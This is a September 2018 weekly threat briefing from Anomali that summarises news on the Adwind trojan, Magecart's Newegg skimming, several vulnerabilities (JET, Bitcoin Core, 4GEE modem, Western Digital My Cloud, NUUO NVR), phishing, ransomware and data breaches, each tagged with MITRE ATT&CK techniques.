September 25, 2018
-
Anomali Threat Research
,

Weekly Threat Briefing: Adwind Trojan Circumvents Antivirus Software To Infect Your PC

<div id="weekly"><p id="intro">The intelligence in this week’s iteration discuss the following threats:<b> Credit card theft, DDoS, Phishing, Ransomware, Trojan, Vulnerabilities, </b>and<b> Web cache poisoning. </b>The IOCs related to these stories are attached to the Community Threat Briefing and can be used to check your logs for potential malicious activity.</p><div id="trending-threats"><h2 id="trendingthreats">Trending Threats</h2><p><a href="https://www.zdnet.com/article/this-is-how-the-adwind-trojan-tricks-antivirus-software-to-infect-your-pc/" target="_blank"><b>Adwind Trojan Circumvents Antivirus Software To Infect Your PC </b></a> (<i>September 24, 2018</i>)<br/> Unknown threat actors have been observed conducting a spear phishing campaign that targets various industries such as finance, manufacturing, shipping, telecoms, and others targeted upon machines in Germany and Turkey in an effort to infect the targets with a Remote Access Trojan (RAT), “Adwind.” MacOS, Windows and Linux operating systems are all vulnerable to this particular jRAT. This specific malware is observed to log keystrokes, steal credentials, tamper with system files as all RATs do, but also steals cryptographic keys to access cryptocurrency wallets on infected systems. This jRAT is spread via spear phishing emails that contain a .csv or .xlt file attachment with a so-called Dynamic Data Exchange (DDE) code injection that intends to compromise Microsoft Excel and circumvent signature-based antivirus protections. The threat actor behind the attack modified the RAT to have a low-detection rate.<br/> <a href="https://forum.anomali.com/t/adwind-trojan-circumvents-antivirus-software-to-infect-your-pc/2972" target="_blank">Click here for </a><a href="https://forum.anomali.com/t/adwind-trojan-circumvents-antivirus-software-to-infect-your-pc/2972" target="_blank">Anomali</a><a href="https://forum.anomali.com/t/adwind-trojan-circumvents-antivirus-software-to-infect-your-pc/2972" target="_blank"> recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947282">[MITRE ATT&amp;CK] Dynamic Data Exchange (T1173)</a> | <a href="https://ui.threatstream.com/ttp/947235">[MITRE ATT&amp;CK] Obfuscated Files or Information (T1027)</a> | <a href="https://ui.threatstream.com/ttp/947180">[MITRE ATT&amp;CK] Spearphishing Attachment (T1193)</a></p><p><a href="https://latesthackingnews.com/2018/09/24/adguard-reset-user-passwords-after-enduring-credential-stuffing-attacks/" target="_blank"><b>AdGuard Reset User Passwords After Enduring Credential Stuffing Attacks </b></a> (<i>September 24, 2018</i>)<br/> Ad-blocking software company AdGuard reported that they had recently suffered a cyber-attack in the form of credential stuffing, and issued a password reset to all users for all accounts. They noticed repeated login attempts from suspicious IP addresses belonging to a variety of servers world-wide, using login credentials from what the company suspects are past data breaches from other companies. As of this writing, the unknown threat actors are believed to have been able to gain access to a handful accounts that had the same password for multiple accounts on other sites. AdGuard issued a total account-wide password reset, but states that no internal servers or data were compromised.<br/> <a href="https://forum.anomali.com/t/adguard-reset-user-passwords-after-enduring-credential-stuffing-attacks/2973" target="_blank">Click here for </a><a href="https://forum.anomali.com/t/adguard-reset-user-passwords-after-enduring-credential-stuffing-attacks/2973" target="_blank">Anomali</a><a href="https://forum.anomali.com/t/adguard-reset-user-passwords-after-enduring-credential-stuffing-attacks/2973" target="_blank"> recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947227">[MITRE ATT&amp;CK] Brute Force (T1110)</a></p><p><a href="https://news.softpedia.com/news/off-path-tcp-exploit-allows-attackers-to-steal-data-via-unencrypted-connections-522841.shtml" target="_blank"><b>Off-Path TCP Exploit Allows Attackers To Steal Data Via Unencrypted Connections </b></a> (<i>September 21, 2018</i>)<br/> Associate Professor Zhiyun Qian and doctoral student Weiteng Chen from the University of California discovered a vulnerability in unencrypted Wi-Fi routers that makes them susceptible to a TCP exploit. The exploit can be employed when threat actors intercept the communication between the router and a user’s machine, and send a malicious payload that appears legitimate to poison the web cache. This allows the threat actor to inject a malicious copy of a web page (typically a login or checkout page one is visiting) so that every time that page is visited, it is the compromised version. This has the potential to give the actor access to the information and credentials entered in those sites. This vulnerability is in all operating systems (macOS, Windows, and Linux), and have yet to see a patch.<br/> <a href="https://forum.anomali.com/t/off-path-tcp-exploit-allows-attackers-to-steal-data-via-unencrypted-connections/2974" target="_blank">Click here for </a><a href="https://forum.anomali.com/t/off-path-tcp-exploit-allows-attackers-to-steal-data-via-unencrypted-connections/2974" target="_blank">Anomali</a><a href="https://forum.anomali.com/t/off-path-tcp-exploit-allows-attackers-to-steal-data-via-unencrypted-connections/2974" target="_blank"> recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947103">[MITRE ATT&amp;CK] Domain Fronting (T1172)</a></p><p><a href="https://www.zerodayinitiative.com/blog/2018/9/20/zdi-can-6135-a-remote-code-execution-vulnerability-in-the-microsoft-windows-jet-database-engine" target="_blank"><b>ZDI-CAN-6135: A Remote Code Execution Vulnerability In The Microsoft Windows JET Database Engine</b></a> (<i>September 20, 2018</i>)<br/> A bug has been identified in Microsoft JET Database Engine that could allow remote execution. This bug is an out-of-bounds write (when software writes data past the end, or before the beginning of the intended buffer, hence “out-of-bounds”) that can be triggered through opening a Jet data source via OLEDB. A threat actor could take advantage of this vulnerability by creating a specific file that contains data that is stored in the JET database format, and having the targeted user open it, which would then allow for remote code execution at the level of the current process. At the time of the article’s publication, a patch has yet to be released.<br/> <a href="https://forum.anomali.com/t/zdi-can-6135-a-remote-code-execution-vulnerability-in-the-microsoft-windows-jet-database-engine/2975" target="_blank">Click here for </a><a href="https://forum.anomali.com/t/zdi-can-6135-a-remote-code-execution-vulnerability-in-the-microsoft-windows-jet-database-engine/2975" target="_blank">Anomali</a><a href="https://forum.anomali.com/t/zdi-can-6135-a-remote-code-execution-vulnerability-in-the-microsoft-windows-jet-database-engine/2975" target="_blank"> recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947180">[MITRE ATT&amp;CK] Spearphishing Attachment (T1193)</a></p><p><a href="https://thenextweb.com/hardfork/2018/09/20/bitcoin-core-vulnerability-blockchain-ddos/" target="_blank"><b>Crippling DDoS Vulnerability Put The Entire Bitcoin Market At Risk </b></a> (<i>September 20, 2018</i>)<br/> A Distributed-Denial-of-Service (DDoS) vulnerability was discovered to affect Bitcoin Core versions 0.14.0 up to 0.16.2 that could bring down the entire Bitcoin blockchain by flooding full node operators with traffic. The vulnerability originates in the consensus code and allowed for Bitcoin miners to have the option of sending transaction data twice. This would cause the Bitcoin network to crash whilst it attempted to validate the duplicate transaction. This type of DDoS attack, however, would require the threat actor to basically throw away 12.5 BTC ($80,000 USD) to actually cause any damage to the network, so it is unlikely it will be exploited. However, it does still exemplify a significant vulnerability to the Bitcoin network. Bitcoin software developers have issued a patch for anyone running nodes.<br/> <a href="https://forum.anomali.com/t/crippling-ddos-vulnerability-put-the-entire-bitcoin-market-at-risk/2976" target="_blank">Click here for </a><a href="https://forum.anomali.com/t/crippling-ddos-vulnerability-put-the-entire-bitcoin-market-at-risk/2976" target="_blank">Anomali</a><a href="https://forum.anomali.com/t/crippling-ddos-vulnerability-put-the-entire-bitcoin-market-at-risk/2976" target="_blank"> recommendation</a></p><p><a href="https://thehackernews.com/2018/09/4g-ee-wifi-modem-hack.html" target="_blank"><b>Flaw In 4GEE WiFi Modem Could Leave Your Computer Vulnerable </b></a> (<i>September 20, 2018</i>)<br/> Security researcher, Osanda Malith, from ZeroDayLab discovered a severe vulnerability in 4G-based wireless 4GEE Mini modems sold by mobile operator, EE. This vulnerability, registered as “CVE-2018-14327,” allows a low-privileged user account to escalate privileges on any Windows machine that had connected to the EE Mini modem via USB. The vulnerability is located in the driver files installed by the modem onto Windows machines, where the folder permissions allow anyone to read, write, execute, create, and delete anything inside that folder and its subfolders. For an attacker to exploit this vulnerability, they just have to replace the “ServiceManager.exe” file from the driver folder with a malicious file to trick the driver into running the tainted file and executing with higher SYSTEM privileges following a reboot. A patch has been released for this vulnerability by EE.<br/> <a href="https://forum.anomali.com/t/flaw-in-4gee-wifi-modem-could-leave-your-computer-vulnerable/2977" target="_blank">Click here for </a><a href="https://forum.anomali.com/t/flaw-in-4gee-wifi-modem-could-leave-your-computer-vulnerable/2977" target="_blank">Anomali</a><a href="https://forum.anomali.com/t/flaw-in-4gee-wifi-modem-could-leave-your-computer-vulnerable/2977" target="_blank"> recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947090">[MITRE ATT&amp;CK] File System Permissions Weakness (T1044)</a></p><p><a href="https://www.zdnet.com/article/this-windows-file-may-be-secretly-hoarding-your-passwords-and-emails/" target="_blank"><b>This Windows File May Be Secretly Hoarding Your Passwords And Emails </b></a> (<i>September 19, 2018</i>)<br/> Windows machines that have handwriting recognition features enabled that translate stylus and touchscreen writing into formatted texts are susceptible to a Windows “WaitList.dat” file storing sensitive information, such as passwords, without the user’s knowledge. The file is intended to store text to help Windows improve handwriting recognition so it recognises and accurately suggests corrections and/or words based on what a user uses frequently. However, once the handwriting recognition feature is enabled, text from every document and email is indexed into this file, not only the files that interacted with the touchscreen feature. This means that the actual data from the document’s text is stored in the WaitList.dat file, not just the metadata. This means that if threat actors gained unauthorised access to this specific file on a machine, they would have access to sensitive data that is unwittingly stored in it, compromising many facets of information.<br/> <a href="https://forum.anomali.com/t/this-windows-file-may-be-secretly-hoarding-your-passwords-and-emails/2978" target="_blank">Click here for </a><a href="https://forum.anomali.com/t/this-windows-file-may-be-secretly-hoarding-your-passwords-and-emails/2978" target="_blank">Anomali</a><a href="https://forum.anomali.com/t/this-windows-file-may-be-secretly-hoarding-your-passwords-and-emails/2978" target="_blank"> recommendation</a></p><p><a href="https://www.volexity.com/blog/2018/09/19/magecart-strikes-again-newegg/" target="_blank"><b>Magecart Strikes Again: Newegg In The Crosshairs </b></a> (<i>September 19, 2018</i>)<br/> E-Commerce company, Newegg, is the latest victim of credit card-skimming campaign by threat group, MageCart. Between late August and early September 2018, MageCart stole credit card data from British Airways and Feedify, and appear to have used the same malicious JavaScript code to compromise the Newegg checkout page to obtain card credentials. This particular breach of information occurred between August 13, 2018 and September 18, 2018. Both data theft campaigns against Newegg and British Airways appear to have occurred around the same time, with the Newegg campaign starting a week earlier than the British Airways campaign. The malicious JavaScript code was injected into the company’s online shopping “Billing Information” page on their website that sent the credentials entered over to the domain controlled by the threat group where they were subsequently stored.<br/> <a href="https://forum.anomali.com/t/magecart-strikes-again-newegg-in-the-crosshairs/2979" target="_blank">Click here for </a><a href="https://forum.anomali.com/t/magecart-strikes-again-newegg-in-the-crosshairs/2979" target="_blank">Anomali</a><a href="https://forum.anomali.com/t/magecart-strikes-again-newegg-in-the-crosshairs/2979" target="_blank"> recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947267">[MITRE ATT&amp;CK] Drive-by Compromise (T1189)</a></p><p><a href="https://www.securify.nl/advisory/SFY20180102/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges.html" target="_blank"><b>Authentication Bypass Vulnerability In Western Digital My Cloud Allows Escalation To Admin Privileges </b></a> (<i>September 18, 2018</i>)<br/> A vulnerability in the “My Cloud” devices from the storage solutions company, "Western Digital," was discovered. This vulnerability, registered as “CVE-2018-17153,” can allow for unauthorised actors to bypass authentication and register their activity on a specific IP address as an administrator. A threat actor could establish an administrator session using the “network_mgr.cgi CGI” module in the HTTP and set the IP address as an admin session that will allow the actor to bypass future authentication when logging into the device over the internet. This then allows the actor complete access over the device. At the current publication of the article, a patch has not been developed or released.<br/> <a href="https://forum.anomali.com/t/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges/2980" target="_blank">Click here for </a><a href="https://forum.anomali.com/t/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges/2980" target="_blank">Anomali</a><a href="https://forum.anomali.com/t/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges/2980" target="_blank"> recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947222">[MITRE ATT&amp;CK] Account Manipulation (T1098)</a></p><p><a href="https://news.softpedia.com/news/paste-site-used-as-hosting-service-for-filesman-backdoor-522765.shtml" target="_blank"><b>Paste Site Used As Hosting Service For FilesMan Backdoor </b></a> (<i>September 18, 2018</i>)<br/> Researcher Bruno Zanelato discovered a backdoor, called “FilesMan,” dropped into several websites due to a pre-existing PHP file placed into the website’s structure by threat actors. This PHP file contains a payload download code that grabs malware to download and install the backdoor. The PHP file “wp-content/themes/buildup/db.php” decrypts that specific payload code to the install the FilesMan backdoor that allows the threat actor to gain access to a website through their own machine.<br/> <a href="https://forum.anomali.com/t/paste-site-used-as-hosting-service-for-filesman-backdoor/2981" target="_blank">Click here for </a><a href="https://forum.anomali.com/t/paste-site-used-as-hosting-service-for-filesman-backdoor/2981" target="_blank">Anomali</a><a href="https://forum.anomali.com/t/paste-site-used-as-hosting-service-for-filesman-backdoor/2981" target="_blank"> recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947202">[MITRE ATT&amp;CK] Shared Webroot (T1051)</a></p><p><a href="https://latesthackingnews.com/2018/09/18/bristol-airport-flight-display-screens-failed-after-ransomware-incident/" target="_blank"><b>Bristol Airport Flight Display Screens Failed After Ransomware Incident</b></a> (<i>September 18, 2018</i>)<br/> Flight display screens at Bristol Airport were inoperable for three consecutive days following a ransomware attack that put the screens out of order. The airport resorted to manually writing down flight times, updates, and gate numbers on whiteboards and flip charts to maintain flight services. Flights were able to operate as normal, though the airport did request that travellers arrive to the airport earlier to allow extra time for checking in and the boarding process. The airport was able to contain the attack and restore the flight display screens. Security officials reported that no ransom was paid and the safety of the security systems remain unaffected during the cyber incident.<br/> <a href="https://forum.anomali.com/t/bristol-airport-flight-display-screens-failed-after-ransomware-incident/2982" target="_blank">Click here for </a><a href="https://forum.anomali.com/t/bristol-airport-flight-display-screens-failed-after-ransomware-incident/2982" target="_blank">Anomali</a><a href="https://forum.anomali.com/t/bristol-airport-flight-display-screens-failed-after-ransomware-incident/2982" target="_blank"> recommendation</a></p><p><a href="https://www.theregister.co.uk/2018/09/18/perth_mint_data_breach/" target="_blank"><b>Just 13 – No, Er, Make That 3,200 Punters Hit In Oz's Perth Mint Hack</b></a> (<i>September 18, 2018</i>)<br/> A security breach at the Australian government’s official mint “Perth Mint” that was initially believed to have only affected 13 customers, has ended up actually affecting over 3,200 customers. The cyber incident appears to have been caused by security failings of a third-party provider, and the company’s internal systems were not compromised. The company contacted affected customers to notify them of the breach and that their personal information was breached, but their investments were not impacted and are secure.<br/> <a href="https://forum.anomali.com/t/just-13-no-er-make-that-3-200-punters-hit-in-ozs-perth-mint-hack/2983" target="_blank">Click here for </a><a href="https://forum.anomali.com/t/just-13-no-er-make-that-3-200-punters-hit-in-ozs-perth-mint-hack/2983" target="_blank">Anomali</a><a href="https://forum.anomali.com/t/just-13-no-er-make-that-3-200-punters-hit-in-ozs-perth-mint-hack/2983" target="_blank"> recommendation</a></p><p><a href="https://www.fortinet.com/blog/threat-research/beware-of-emails-purporting-to-be-from-the-irs.html" target="_blank"><b>Beware Of Emails Purporting To Be From The IRS </b></a> (<i>September 17, 2018</i>)<br/> Researchers at Fortinet discovered a recent phishing email campaign pretending to be from the US Internal Revenue Service (IRS). The email is directed to “Non-Resident Alien” tax payers to have them fill out a PDF file (that is attached to the email) that certifies one is a non-resident or foreign corporation. The attached PDF is named “W-8BEN Form.PDF” and impersonates a legitimate IRS form. The file does not contain any malicious macros or code, so it appear to be clean to open on a computer. The email asks the target to file out the attached form and then fax it over to a specific fax number. The objective of this campaign is to steal Personally Identifiable Information (PII).<br/> <a href="https://forum.anomali.com/t/beware-of-emails-purporting-to-be-from-the-irs/2984" target="_blank">Click here for </a><a href="https://forum.anomali.com/t/beware-of-emails-purporting-to-be-from-the-irs/2984" target="_blank">Anomali</a><a href="https://forum.anomali.com/t/beware-of-emails-purporting-to-be-from-the-irs/2984" target="_blank"> recommendation</a></p><p><a href="https://www.tenable.com/blog/tenable-research-advisory-peekaboo-critical-vulnerability-in-nuuo-network-video-recorder" target="_blank"><b>Tenable Research Advisory: Peekaboo Critical Vulnerability In NUUO Network Video Recorder</b></a> (<i>September 17, 2018</i>)<br/> Researchers at Tenable Research discovered two vulnerabilities in monitoring and surveillance company NUUO’s “Network Video Recorder” software in the “NVRMini2” network-connected, video recording device. The two vulnerabilities have been registered as “CVE-2018-1149” and “CVE-2018-1150” and are linked to the third-party vendor software installed on the device. The first vulnerability, CVE-2018-1149, is an unauthenticated stack buffer overflow which allows for remote code execution with root/administrator privileges. This vulnerability could then be leveraged to take over the NVRMini2 device and manipulate the connected cameras. The second vulnerability, CVE-2018-1150, is a backdoor that is believed to be caused by leftover debug code, and allows the list of all user accounts on a system to be accessible with their passwords capable of being manipulated. Changing the passwords could then allow a threat actor access to that account with their own passcode, and then sign on as a legitimate user to view camera feeds or CCTV footage and recordings as well as delete a camera from a system completely. These vulnerabilities could allow threat actors to tamper with security footage and live feeds. A patch is currently in development for both vulnerabilities.<br/> <a href="https://forum.anomali.com/t/tenable-research-advisory-peekaboo-critical-vulnerability-in-nuuo-network-video-recorder/2985" target="_blank">Click here for </a><a href="https://forum.anomali.com/t/tenable-research-advisory-peekaboo-critical-vulnerability-in-nuuo-network-video-recorder/2985" target="_blank">Anomali</a><a href="https://forum.anomali.com/t/tenable-research-advisory-peekaboo-critical-vulnerability-in-nuuo-network-video-recorder/2985" target="_blank"> recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947209">[MITRE ATT&amp;CK] Third-party Software (T1072)</a></p></div></div>

Get the Latest Anomali Updates and Cybersecurity News – Straight To Your Inbox

Become a subscriber to the Anomali Newsletter
Receive a monthly summary of our latest threat intelligence content, research, news, events, and more.